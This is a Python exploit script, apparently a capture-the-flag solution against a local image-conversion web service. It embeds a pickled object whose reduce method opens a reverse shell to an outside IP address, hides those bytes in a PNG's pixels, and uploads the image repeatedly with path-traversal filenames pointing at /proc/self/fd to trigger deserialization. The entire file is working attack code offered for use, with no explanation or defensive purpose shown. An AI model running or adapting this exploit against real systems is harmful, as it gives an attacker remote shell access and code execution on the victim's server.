import requests
import pickle
from PIL import Image

URL = "http://localhost:5000"

class Meow(object):
  def __reduce__(self):
    return (exec, ('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("5.161.227.224",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")',))

W, H = 8771, 5903 

tail = pickle.dumps(Meow(), protocol=pickle.HIGHEST_PROTOCOL)

im = Image.new("RGB", (W, H), (0, 0, 0))

row = []
pad_len = (-len(tail)) % 3
data = tail + b"\x00" * pad_len
for i in range(0, len(data), 3):
    B, G, R = data[i], data[i+1], data[i+2]
    row.append((R, G, B)) 

pixels = im.load()
for x, (r, g, b) in enumerate(row):
    pixels[x, H - 1] = (r, g, b)

im.save("pickle.png")

def bmp_payload(filename: str):
    return f"../../usr/share/doc/li{filename.rsplit('.', 1)[1] if '.' in filename else filename}fr6/../../../../../..{filename}"

p = '/proc/self/fd/13'
r = requests.post(URL + "/convert", files=[
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
    ("files", (bmp_payload(p), open("./pickle.png", "rb"), "image/png")),
], data={
"format": "BMP"
})

print(r.status_code)
print(r.content[:200])